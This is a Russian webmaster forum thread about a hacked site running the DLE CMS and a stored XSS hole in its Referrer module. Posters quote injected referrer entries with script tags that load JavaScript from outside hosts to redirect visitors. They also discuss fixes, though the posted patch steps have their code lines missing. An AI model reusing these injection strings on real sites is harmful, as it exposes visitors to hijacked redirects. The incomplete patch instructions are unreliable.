- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee

В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Сегодня сломали один сайт, узнал это благодаря Яндексу, который любезно повесил табличку "опасно" рядом с моим сайтом. Проверил все что можно. А оказалось, решение было на поверхности.
Итак, взломать можно любой сайт на DLE, где стоит модуль Referrer (Переходы).
Ответ нашел в гугле:
Посмотрите в корлонке слева. Там есть запись "Google: rune". На самом деле ее код таков:
<strong>Google</strong></a>: <a href="/">rune<script src=http://m9cp.chat.ru/c.js></script></a>
Как можно заметить тут подключается "левый" JS, выполняемый в контексте сайта.
Тоже самое касается и "Google: pcgames":
<strong>Google</strong></a>: <a href="/">pcgames<script src=http://gtour.in/m.js></script></a>
Суть скрипта в том, что он анализирует реффер. Если реффер поисковая система, то идет перенаправление на нужный сайт с сохранением запроса.
Мораль сей басни такова, что нужно весь пользовательский ввод выводить через htmlspecialchars.
Что делать, я думаю вы поняли сами - срочно снимать модуль со своих сайтов.
PS: возможно вышел фикс модуля, не проверял
Уже почти 3 месяца как вышел.
http://getdle.org.ru/dle/modules/146-modul-perehody-89-final-release.html
Нефига неработает эта баг фикса. У меня таже проблема, посавил ее толку 0.
Что делать, я думаю вы поняли сами - срочно снимать модуль со своих сайтов.
Фикс вышел. А так дырка довольно интересная. Шикарная, я бы сказал. XSS в чистом виде.
Блин народ! Кто разбирается в PHP(я) уже давно(сразу как появилась проблема) ее решили... там только три строчки добавить надо и все!
Значит, так:
Фиксим дыру...
Идем в файл engine/modules/referer.php и там перед
ставим
Затем ищем
и после вставляем
далее идем чуть ниже и ищем
после вставляем
Сохраняем файл и радуемся жизни!
Самое интересное в том что данная проблема у тех у кого стоит последняя версия этого модуля 8.9. У тех у кого более ранняя версия притензии вроде бы нет ))
RoMaN444Ik, Спасибо. Как раз то что надо. Сейчас попробую поставить. Если все будет ок - я тебя расцелую :)
_Vorobey_ добавил 02.08.2011 в 15:11
Хм, первый переход: В Блоке ссылок видим вот что
В Админке просто bees. Ошибки не в Блоке не в Админке нет. Вроде бы все окей. По поводу <script> так и должно быть? Или я своими кривыми лапами что то не так сделал. Возможно, в блоке ссылок, сам переход должен отображаться как в Админке? Т.е. просто bees.
Блин народ! Кто разбирается в PHP(я) уже давно(сразу как появилась проблема) ее решили... там только три строчки добавить надо и все!
Значит, так:
Фиксим дыру...
Идем в файл engine/modules/referer.php и там перед
ставим
Затем ищем
и после вставляем
далее идем чуть ниже и ищем
после вставляем
Сохраняем файл и радуемся жизни!
Поставил, теперь запросы идут з ГУГЛА такого типа: downloads3Cscript20src=http:toyotapprugogogojs3E3C2Fscr - то-есть он уже скриптом не считаеться?
Да что вы херней страдаете?
Заходим на оф. сайт скрипта и качаем последнюю версию.
Уже 3 месяца, как известно о проблеме и её решении.
Да что вы херней страдаете?
Заходим на оф. сайт скрипта и качаем последнюю версию.
Уже 3 месяца, как известно о проблеме и её решении.
Вот именно что з последней версией XSS и пришло ко всем в гости, мне их решения не помогло, всеравно приходили ссылки з скриптом в адресе, вот данный метод в этом топике мне помог вроде.... Но всеравно приходят ссылки, тока без действующого скрипта....
О недостаточной фильтрации уже очень давно известно.
А вобще хочу сказать, что все же дырки мы сами себе лепим, устанавливая левые модули и левые хаки. К тому же, некоторые еще и деньги платят за модуль с дыркой. ДЛЕ и так вся в дырах, а тут еще и в модах с хаками.